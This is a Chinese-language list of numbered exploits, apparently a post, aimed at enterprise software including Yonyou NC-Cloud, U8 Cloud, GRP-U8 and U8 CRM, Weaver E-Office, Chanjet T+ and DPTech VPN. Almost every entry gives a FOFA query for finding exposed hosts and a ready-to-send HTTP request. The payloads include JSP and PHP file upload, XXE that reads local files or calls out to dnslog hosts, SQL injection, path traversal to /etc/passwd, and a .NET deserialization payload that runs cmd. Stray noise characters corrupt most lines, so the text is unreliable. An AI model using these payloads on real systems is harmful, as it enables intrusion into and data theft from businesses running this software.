$ E9 G2 F: O- o+ o7 aFOFA:app="用友-NC-Cloud"+ ]* X2 _0 F/ y# |- W
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1' m3 a/ C* q: e& D* l
Host: 203.25.218.166:88884 D- c5 O( y, W6 w
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
/ z& m5 B' p% T. \& z1 Q1 fAccept-Encoding: gzip, deflate8 ^7 b/ s. B3 c
Accept: */*9 B b! P9 k" Y) r
Connection: close8 K. t2 e0 y" f3 B/ h4 Z6 k
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA9 S6 s" F3 a6 o2 }% J
Content-Length: 1904 E, ~1 P0 I- l2 f D) [. t
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
% e, l8 Z1 y# D( o* e
1 e! J- S0 Y! O: n* @0 h--fd28cb44e829ed1c197ec3bc71748df0
, ]; `; s- o4 \* g- fContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"7 x8 |3 ]3 o% T& T5 @9 T# r+ k
5 v5 F' c, P& Q2 R5 u# E$ s
<%out.println(1111*1111);%>
5 e i( U$ [' J' ?5 ?--fd28cb44e829ed1c197ec3bc71748df0--) P |" l P% y4 j
# V5 {+ ^4 f$ j9 [0 Q( O. @- W: ?
* h8 Q/ y+ N, J( b$ X" G4 w36. 用友NC-Cloud soapFormat XXE! [; J8 \- ^/ W$ L, ?) ]
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
" Q2 `8 @8 d! x/ S! w# }# KPOST /uapws/soapFormat.ajax HTTP/1.1$ \6 W4 L5 L( E o4 y" X) v4 o" F
Host: 192.168.40.130:8989
1 d3 D2 k. F; f9 x/ ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
( |# L% Q# U# S! ~Content-Length: 263
5 f$ b0 ~8 x1 | RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, O) P/ l1 f8 H& AAccept-Encoding: gzip, deflate
/ [# E" C+ O- I( TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 z4 d) |; Y2 Q9 q+ h/ a
Connection: close2 ^; X$ f$ {& E8 o& G# k
Content-Type: application/x-www-form-urlencoded
4 x X: S1 Q$ C' n L- y, HUpgrade-Insecure-Requests: 1 r/ t! t* G5 Q+ k) `
% ?4 @* ^; |/ ]3 [8 V8 Z( j
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
7 l5 |8 }& {- ]! I
) T' z. Y5 f8 B: c
5 r3 s- e2 P2 _' _9 \& m. a8 G4 B37. 用友NC-Cloud IUpdateService XXE$ ?, H# m3 D: Q$ }) B+ {4 @& ^
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
% p; |- J' @# t0 h8 C1 lPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
( r9 l, ]- v% Y0 M! p' y" LHost: 192.168.40.130:8989
3 I! V+ |0 d1 j( H; fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
8 J/ S& m, B# a7 _5 sContent-Length: 421
2 X" m2 y3 R7 A: L, ]) l/ }+ P- xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' I1 h+ \. Q' I' D6 R
Accept-Encoding: gzip, deflate
" o8 V6 Q6 @) tAccept-Language: zh-CN,zh;q=0.9
) ^8 a' X O2 `- w# SConnection: close
9 ?3 J' q8 ]4 N% V% y6 ?1 kContent-Type: text/xml;charset=UTF-8
# {# Y6 p/ f; T6 ]( F fSOAPAction: urn:getResult: M, g. j* E: k! J* L8 \1 `
Upgrade-Insecure-Requests: 15 X8 w$ e8 a: s) M6 s
$ I/ ?8 K3 I: C) y' F<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
- _: |, V: I8 n' t<soapenv:Header/>( |3 Y5 r ^, d, Q2 Y9 f
<soapenv:Body>
9 P( J( V3 W9 a% n9 Z5 J<iup:getResult>) s: T: n* k D
<!--type: string-->! h& l) X" w; }, {# J
<iup:string><![CDATA[$ p$ O- X' I, A2 r/ w
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
; M8 L0 p3 x! ~; m3 W( S9 F<xxx/>]]></iup:string>2 a2 S- p& ]. }# T
</iup:getResult>
$ e/ X' C% f' u6 U( }</soapenv:Body>
/ n4 T/ B* O' p( l6 ^</soapenv:Envelope>4 i) o, H2 e9 t% ]: y9 G w2 V
: l- ^& l8 G! S ~
1 K. B! W+ T$ M1 B: v: f
. p1 y1 d; R/ ^$ {! X# `38. 用友U8 Cloud smartweb2.RPC.d XXE
; P7 j# i. ?/ O, I2 f+ [2 V- kFOFA:app="用友-U8-Cloud"+ ^! o# _ d# p
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.19 M5 f0 k7 p$ ^# C6 k& K5 `# [4 W5 o
Host: 192.168.40.131:8088
- o. y: h/ h% J( J' |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
. c8 C" V) _4 `1 IContent-Length: 2600 y1 x0 C6 v' B# L6 X. p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
9 E" C7 o# i& j6 {' qAccept-Encoding: gzip, deflate' k" b; j5 N; B5 f2 p- f
Accept-Language: zh-CN,zh;q=0.9
6 t* |" L2 ?* Q1 o9 [Connection: close
2 o) R3 X _/ \) E! B' p, J; wContent-Type: application/x-www-form-urlencoded
5 d1 m; L" b3 R' n5 f$ n
! F3 } y$ k3 e& Y0 J__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
/ Y0 ?5 V; o6 j# ~$ M" T
% q0 z& u) c+ j
; L6 ?/ G( X- z$ @8 j/ d D39. 用友U8 Cloud RegisterServlet SQL注入
( F( |( h2 b1 Z& y; Z8 eFOFA:title="u8c"
; l( [$ \6 D" U: T+ I) HPOST /servlet/RegisterServlet HTTP/1.1
, {- @% x3 d2 U# @- k3 [Host: 192.168.86.128:8089
# K5 N1 F A& TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
* a% _+ W4 {9 u' XConnection: close3 c9 _# ]) [5 c( c
Content-Length: 85
# i! h* \$ A2 q: Y$ T5 U1 ^Accept: */*
( W5 y, D" T. X& Y1 @1 i" NAccept-Language: en
( c9 v& l* m8 g) _& y& U% tContent-Type: application/x-www-form-urlencoded4 v8 j: D+ R' {: m5 B
X-Forwarded-For: 127.0.0.1
, `9 X% o' v5 A* ?Accept-Encoding: gzip
. C3 K" }0 X0 S2 w- X# k6 C O' g$ `
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--- u* [ K/ s, m) b) p
$ U l4 i1 ^( s* M+ q% p: f
4 q2 c- ^( D9 m" G" R% X( W* w( y
40. 用友U8-Cloud XChangeServlet XXE: t( u t; _+ u* g& E
FOFA:app="用友-U8-Cloud"
+ A% U3 I+ e+ E3 f$ P) M0 pPOST /service/XChangeServlet HTTP/1.1! Q( F2 t' }7 b1 t6 P$ C7 c- G
Host: x.x.x.x
7 A# P% }7 o; K. s* e0 UUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; s4 X7 W3 h$ D) S6 C6 mContent-Type: text/xml
, u5 Q7 G" v! s" r% \Connection: close
8 _, o# R7 U( C9 \: N8 K; X1 Q( u2 W+ h4 ~8 G% Z+ \
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r># X! M9 U5 y3 a' M8 p; |. c
4 r4 I2 R9 M4 t$ K$ C2 F
, ~0 y! p: P3 V( C" Z41. 用友U8 Cloud MeasureQueryByToolAction SQL注入$ y8 ] Y. d# x5 }
FOFA:app="用友-U8-Cloud"
$ W, W( g; L8 I& R' ZGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
0 ?5 O0 [2 @( U, Q$ `# gHost: s4 ^) M+ C6 v2 d/ G0 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 p# t4 ^4 E3 {; U- B9 ~
Content-Type: application/json
0 T' {4 w0 I, F" r* t9 dAccept-Encoding: gzip5 B$ w3 e& N) ]
Connection: close
1 S" t' W G+ a( b; d7 I) s, I+ K. |' \4 y8 _+ g* e
. S& T3 A' ?! r: c6 k42. 用友GRP-U8 SmartUpload01 文件上传
: B; d2 E& C. U; wFOFA:app="用友-GRP-U8"3 e% h) d1 V& _/ o4 _1 O
POST /u8qx/SmartUpload01.jsp HTTP/1.1
% x' ]! F) m& }. R! dHost: x.x.x.x* Y; N; E- q$ e9 b& T9 F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
+ Q1 u& } P# Q2 N1 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
4 N# ^( [( t" f" a
( x# f' [, u4 h# \7 l& mPAYLOAD
) ^' R4 _. h2 V; r: ~3 ], `
3 E6 x& e: k) D3 R% V$ l
Z" V$ q8 S% ~+ r$ Z4 b4 Ohttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml8 [. B6 x1 Q6 Z8 J) a' o, {
" E3 X; Z& X' @5 q6 y7 U% H
43. 用友GRP-U8 userInfoWeb SQL注入致RCE4 Z8 e/ S4 x" F+ n. V! C# [
FOFA:app="用友-GRP-U8"
: i( U' J0 s" A: T. X/ {POST /services/userInfoWeb HTTP/1.1" N5 l `6 [; f) | g. P0 X0 C8 r
Host: your-ip
9 G& x3 v# A$ b4 p( S% x' RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% E8 |* j% p7 z6 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
T0 G- [/ F* Q; M" eAccept-Encoding: gzip, deflate$ ~+ L% i, r9 \& O# `
Accept-Language: zh-CN,zh;q=0.9
2 D3 N7 M8 Q0 `% ~Connection: close; I0 l# C) d5 S+ s
SOAPAction:
: N s; X$ m" b+ D1 y) z. ^Content-Type: text/xml;charset=UTF-8) y0 J* z' t- v7 _0 l
. i3 X' R! j: i
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">* o) h) D8 W6 r" \5 G) T, h! w
<soapenv:Header/>
t' `% F8 b0 t+ Z& ~# s$ i7 L. Z <soapenv:Body> R3 e/ z/ j0 n- d. w! ~
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
) A ]$ `9 ~# N8 s+ x <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>' C% T. a/ [& U: q% \
</ser:getUserNameById># K: N2 w$ S5 ]0 g9 q! w( g% m/ R
</soapenv:Body>* M! _# l+ W6 B8 {6 t# X0 R9 n5 O
</soapenv:Envelope>$ M) H1 L$ ^( V" b: F, s+ o" D
/ H6 {4 i. @1 Y% |! u/ n5 a* i# ]8 o$ S1 P m$ C) @. m/ f/ D
44. 用友GRP-U8 bx_dj_check.jsp SQL注入2 x. \0 D3 H: V2 u9 g$ o( v& E
FOFA:app="用友-GRP-U8"
4 a5 F7 q5 f: H& A# sGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.19 E: }! L6 X! g( x
Host: your-ip. k7 p/ _; ?2 g/ H3 ]2 w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36* |! T$ a+ V" W* Q, M5 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 K' |/ C' Y* b1 Q. i7 H
Accept-Encoding: gzip, deflate$ _9 K) U! n& k+ E& k# s
Accept-Language: zh-CN,zh;q=0.9' ~1 o; c+ \8 ?& U
Connection: close3 H, ?. ~- M7 a( g
O3 A' o+ `! }8 r" R; T% D1 p: P' h, i3 a+ z' M4 T
45. 用友GRP-U8 ufgovbank XXE7 |2 V8 C4 P1 D5 E- q5 [
FOFA:app="用友-GRP-U8"
4 O2 {. j; M9 P+ TPOST /ufgovbank HTTP/1.1: G- [& @, i3 X h8 A
Host: 192.168.40.130:222
5 i5 `# H( N" P' O# NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.04 C0 |7 n: @- C) H' o% b3 A* O8 o
Connection: close" {' L5 s3 q0 j
Content-Length: 161
9 s4 N* R+ e3 j. E& e) @( j7 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" `( L! K( b3 V# ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 N6 j* _5 _. I7 c- `1 ~
Content-Type: application/x-www-form-urlencoded8 D0 p2 u) [4 [3 [* @
Accept-Encoding: gzip9 ]) v) F+ ?6 D1 h& t( y' F
1 X7 }1 l4 o, G& C; T5 xreqData=<?xml version="1.0"?>, h8 s6 R5 b3 H3 \) ] e
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
7 \" o' b. C+ w2 n4 ^" `0 f/ @5 Q# G; f e+ G, c
( g; ^9 q0 `3 ~ ?- V
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
* M N' U ?. A/ p5 AFOFA:app="用友-GRP-U8"9 ^) M2 Y' } j
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1( `5 V6 t# {+ s
Host: your-ip
0 n. F) Q- n- B9 V4 a. q. _# o GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36( ~6 t- q4 p3 x( ]& ^% g& u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 |: ]9 A5 `0 ^3 y
Accept-Encoding: gzip, deflate
8 j& ]: Q7 b- I' [# L8 \( }Accept-Language: zh-CN,zh;q=0.93 b3 ? z/ G2 h4 f
Connection: close# o0 m3 r% X7 R9 E1 B4 e, P/ K- ?; t+ }
$ w$ x. ^; X9 Y$ Z, X
7 Q2 ^, K6 c4 @* G" x6 k. f47. 用友GRP A++Cloud 政府财务云 任意文件读取7 J0 E9 G9 R, D8 O4 U1 K
FOFA:body="/pf/portal/login/css/fonts/style.css"
V/ y" E3 n/ r0 f% `7 D9 LGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
! q# g! s+ f3 V/ p! JHost: x.x.x.x1 m) B1 T+ |6 n; F) ^& p
Cache-Control: max-age=09 h* f3 H/ L5 x U2 j: F
Upgrade-Insecure-Requests: 1/ P5 X2 r6 U4 \9 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& D1 d: C% _$ w' ~6 z7 h' aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ l# |9 v1 \5 P: h; [. J; ^Accept-Encoding: gzip, deflate, br
! I& a2 r. }9 S! Z3 g: B) OAccept-Language: zh-CN,zh;q=0.9
7 u, K; D0 e& `: h( \2 }6 C% v c+ ^If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT' ~) t/ T% D2 S ~ U' [- j
Connection: close
& {) s. V0 H9 _0 l0 W k
: T y2 h2 T/ ]2 y% ?+ N# l/ a
, p, }3 o* h" `; q4 {- o
3 Z; S0 E3 U7 x5 g6 o: a* \48. 用友U8 CRM swfupload 任意文件上传
9 t+ f2 X+ P/ K2 _FOFA:title="用友U8CRM"- m5 F8 _$ y( M/ x5 X2 B" Y
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.17 S4 g. c4 u. l$ w* q( T
Host: your-ip
5 @# }: r9 s6 I9 ^/ {; oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ d: ^$ _: c& c$ nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; \: X& |: k0 O V) H' fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 R( S9 {7 u) C" T9 ~7 ^Accept-Encoding: gzip, deflate
. b5 ~+ [3 k1 R0 ?( E2 {Content-Type: multipart/form-data;boundary=----2695209672394068716424300668554 x& s5 m( g- _$ o/ g2 ?: F7 e
------269520967239406871642430066855
7 ]3 i' d1 s% }" CContent-Disposition: form-data; name="file"; filename="s.php"& s' ~$ Y& v# O/ l$ W
1231
6 b: W0 h$ p1 |0 Y. n, O' Y$ X+ tContent-Type: application/octet-stream
X+ n6 E) J" Y------269520967239406871642430066855$ R7 r" _7 G/ k1 z/ i4 `
Content-Disposition: form-data; name="upload"
) d3 w2 b% w# `4 Mupload
0 I. Y1 N3 ?. c6 E# [------269520967239406871642430066855--" G, ~5 d# c# e, H, X# {2 M. S3 z
; W9 U r. E4 [# Z3 ^
( t( c3 {* @5 w0 y+ h4 v
49. 用友U8 CRM系统uploadfile.php接口任意文件上传2 K% T0 m: d% }
FOFA:body="用友U8CRM"
. ]' Z. M. V* ^" `+ Y4 ~( l5 i) G0 J: o- l. \( U$ D5 b7 v
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1. ]3 U% a! S- L3 J3 W. a
Host: x.x.x.x
- Z0 T- q9 k! g: uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 t1 h! K* H( m3 c0 l, Z* J
Content-Length: 329
; e' r" ^ S A7 z3 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ [& e4 X! T' a! S4 ?$ u% rAccept-Encoding: gzip, deflate
8 P. C: Y5 N& o4 U r; n- {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) \! o6 U& b/ o2 F e
Connection: close# b, V0 |% ?" s0 T
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
/ f n+ {) r& I2 A7 k$ P$ l: `: R5 ^! s
-----------------------------vvv3wdayqv3yppdxvn3w
0 f8 _4 T* j# v9 rContent-Disposition: form-data; name="file"; filename="%s.php "
: M e5 V, \5 u( N" _" k0 Y. m& N' IContent-Type: application/octet-stream8 t8 b: W) U7 n N
* q4 s7 }- W+ _! K3 M# q
wersqqmlumloqa% g0 u7 P) W6 [8 M1 O
-----------------------------vvv3wdayqv3yppdxvn3w: R! h& k' j8 U8 d
Content-Disposition: form-data; name="upload"( R' s% j" s6 P& G1 l4 o
: I* |4 m9 b4 u, x3 Z
upload
' h# z3 {" [) i6 |; \-----------------------------vvv3wdayqv3yppdxvn3w--7 L( Z. Z/ b( |( Y8 F% a1 _
" b- i% e, S8 }6 ?1 G; r
) h% i% E% B$ b* b9 S8 ?http://x.x.x.x/tmpfile/updB3CB.tmp.php
* B; Q9 |* d4 `% k
9 q s& f" V' `* u, ^. _# \8 d50. QDocs Smart School 6.4.1 filterRecords SQL注入% R# @0 [4 C1 H- e" @# h
FOFA:body="close closebtnmodal"
% s/ F/ T% z3 _. UPOST /course/filterRecords/ HTTP/1.1
$ b$ P( M: }, U( { q) {; M8 mHost: x.x.x.x
# c8 }0 T. K0 o* LUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 L, d4 b; Q L. s- g5 O
Connection: close
" u. k: d& X _, SContent-Length: 224
, [8 V& W4 d s" @9 i# u6 WAccept: */*9 r( U+ G$ D. _5 k5 ~
Accept-Language: en$ {8 v$ N& z3 k2 F+ \( G
Content-Type: application/x-www-form-urlencoded( x9 O2 G; L, Z! f4 X' I7 @
Accept-Encoding: gzip* v6 x- _# w5 w; q, H
. r6 k3 { ~5 \1 E$ f, o$ Xsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
' O/ m! F6 _2 [' I1 ^* _' j- o6 M6 N! c* H- F1 M- }! w
7 k. V1 x& k2 l, k2 v51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入1 k* Q2 q7 G" d0 r* G. j
FOFA:app="云时空社会化商业ERP系统"
6 y8 W0 b; `, T" NGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
6 u( ?+ T8 s' V! U( T" jHost: your-ip. Q6 h$ K7 E6 Y( O, H# `: p) u
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.361 m% f% j, B3 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9* S/ j) O: \: M* N& A
Accept-Encoding: gzip, deflate
) d& G1 q: Y3 S6 ?Accept-Language: zh-CN,zh;q=0.9
) F( c$ q2 n8 N9 c" C$ Z* SConnection: close4 y1 l8 v2 m% g, F) j2 @! _# D
' G! ^5 W9 s) t0 L6 P1 }% H) U
! K1 P7 O; r2 {. Y- ~52. 泛微E-Office json_common.php sql注入/ S( g7 \/ Q1 o" D
FOFA:app="泛微-EOffice"
: r2 g4 u3 C ]2 B5 {3 k6 O6 o4 MPOST /building/json_common.php HTTP/1.1
q/ y% N; F4 Q0 f- @Host: 192.168.86.128:80974 Z, ^1 V( r- ~. y' W+ U" @
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" t, B& x9 ^# Y( s2 R" d9 I7 W- N9 \
Connection: close
& U+ [! C; J9 J$ [# h' PContent-Length: 87' F9 ?/ A: W8 e( C6 X' [
Accept: */*
7 x# L; j' ~6 `; {: x) NAccept-Language: en, P) e4 b6 s' }, W# Q l3 [
Content-Type: application/x-www-form-urlencoded3 d; F: t8 N0 u
Accept-Encoding: gzip
+ F1 H7 `/ L0 E6 M1 ~# |
3 L. O: O' A! j3 S6 Otfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333! o# L6 D. _5 X) v; B4 O: [: T
+ C }1 Q5 S8 ?& \" S7 p T9 F
# l* l2 A& A" x3 O; X5 I53. 迪普 DPTech VPN Service 任意文件上传) G/ x' X! W" H3 \
FOFA:app="DPtech-SSLVPN"7 z- k0 f* F" o
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd3 a. ~$ p- o8 N0 V4 d! `
* B& J0 V k; D2 O1 C+ K9 H$ P
5 k1 K1 F, X) A4 V5 ?; q
54. 畅捷通T+ getstorewarehousebystore 远程代码执行9 @, J8 X! }# i; ?* Y
FOFA:app="畅捷通-TPlus"
3 Y) [) u. V0 n" A第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件/ b& S# u9 {7 \, k" l
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
2 ^' e2 h, ]" x' C+ W X, q0 p
5 S" `! L' C- t1 w$ f4 _0 c9 A6 w
, }' S' T7 N! J- J9 o完整数据包
, e# y4 ]: G" `# i% D, o4 APOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
. ?$ @& {% j9 ?6 fHost: x.x.x.x
/ ?; [9 Y! M; M/ C0 _3 p' C% `User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
, F1 S% e& @- f7 T7 j$ D. E8 d5 bContent-Length: 593
. ^4 |/ k$ t; W8 W9 \* Y. l3 D0 S8 T% Y6 w9 X9 @
{
) `. C4 U5 H9 k, g"storeID":{
7 \, x5 F! h6 b: ]1 V) k "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",1 t9 ~* \% j& Y- C1 [+ j4 Q
"MethodName":"Start",
* u3 C4 a* p# M; I! M" T) {" U "ObjectInstance":{
& o9 L3 b' b7 f i+ Z8 f7 B1 Y* z8 p "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",7 {; Q9 Y0 ?6 P) S4 H! x+ [7 H" X5 U# S) a
"StartInfo":{
4 {9 u; @; D5 F' x8 I "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",. |2 K1 @" j3 d5 {$ R) l3 y; R1 f: G- P
"FileName":"cmd",$ @/ K X8 \% ?; b
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
& B" r) b$ ^. ]8 j }
- ?5 T, W, ~1 Q7 @ }. ~( [. e* F* p' R/ ~+ p5 w0 b
}/ s4 X, e1 y, H
}
/ K* j0 ?& u$ ]6 U# h& x: T7 u8 H$ I z
) Z: I$ t% v' W" M- ~第二步,访问如下url" N- @* j9 q9 X
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt( g. S6 i4 ^) Q' `% V1 u4 d2 D
1 q7 ^ C8 {; d5 L0 b8 X
5 \" Z4 n% Y* D" |" [55. 畅捷通T+ getdecallusers信息泄露
( v1 O( s* U- l" H1 N. _) rFOFA:app="畅捷通-TPlus"
* Y2 K* p# p( u% D1 C7 \6 M; g第一步,通过, J3 B+ n W% y1 A z
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie# V6 a5 A! \& p+ o; j9 n, I9 G
第二步,利用获取到的Cookie请求
* c: B9 K9 D8 G" m/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers& E6 `+ V) }9 X7 _
% [9 t+ F7 p: k- Z0 ~6 S56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE* h6 [6 ~9 V- ]2 s$ r
FOFA: app="畅捷通-TPlus"2 `* }5 G% T f1 n6 I
